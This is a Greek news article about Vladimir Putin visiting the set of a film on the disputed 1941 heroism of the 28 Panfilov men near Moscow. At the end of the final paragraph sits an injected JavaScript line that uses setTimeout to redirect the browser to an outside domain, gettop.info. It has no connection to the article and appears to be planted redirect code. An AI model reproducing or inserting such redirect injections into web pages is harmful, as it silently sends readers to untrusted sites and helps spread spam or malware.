Οι 28 άνδρες του Πανφίλοφ, το όπλο του Πούτιν

0
18

 

Εκστρατεία να ανακτήσει την εθνική υπερηφάνεια διεξάγει ο Ρώσος πρόεδρος Βλαντίμιρ Πούτιν κι ετοιμάζει ακόμη και ταινία σχετικά με μία πιθανώς αναληθή ή μεγαλοποιημένη ηρωική ενέργεια στον Β’ Παγκόσμιο Πόλεμο, όπως μετέδωσε το BBC News.

O πρόεδρος της Ρωσίας μαζί με τον πρόεδρο του Καζακστάν, Νουρσουλτάν Ναζαρμπάγιεβ βρέθηκαν στα γυρίσματα της ταινίας «Οι 28 άνδρες του Πανφίλοφ».

Η ταινία βασίζεται σε ένα πολυσυζητημένο επεισόδιο κατά την προάσπιση της Μόσχας το 1941, στη διάρκεια της γερμανικής εισβολής στη Ρωσία. Μία μονάδα της 316ης μεραρχίας πεζικού του Κόκκινου Στρατού, αποτελούμενη κυρίως από Καζάκους και Κιργίζιους αναφέρθηκε ότι απώθησε γραμμή τεθωρακισμένων κοντά στο χωριό Ντουμποσέκοβο καταστρέφοντας 18. Και τα 28 μέλη της μονάδας σκοτώθηκαν.

Το 1942, ολόκληρη η ομάδα τιμήθηκε με τον τίτλο του Ήρωα της Σοβιετικής Ένωσης και προς τιμήν τους ανεγέρθηκαν μνημεία σε διάφορες πόλεις, συμπεριλαμβανομένης της μεγαλύτερης πόλης του Καζακστάν, του Αλμάτι. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here